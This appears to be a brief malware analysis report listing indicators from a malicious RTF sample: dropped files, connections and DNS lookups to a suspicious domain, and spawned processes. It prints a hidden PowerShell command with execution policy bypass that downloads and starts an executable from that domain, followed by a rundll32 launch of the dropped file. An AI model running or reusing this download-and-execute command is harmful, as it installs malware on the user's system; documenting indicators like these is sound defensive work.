Technical information
- https://de-grisogoono.com/report_week.exe as %appdata%\report_final
- %TEMP%\abctfhghgdghgh‹.sct
- <Current directory>\~wrd0000.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- <PATH_SAMPLE>.rtf
- 'de####sogoono.com':443
- 'oc##.#tartssl.com':80
- 'de####sogoono.com':443
- DNS ASK de####sogoono.com
- DNS ASK st####.rapidssl.com
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://de-grisogoono.com/report_week.exe','%APPDATA%\report_final');Start-Pr...' (with a hidden window)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\report_final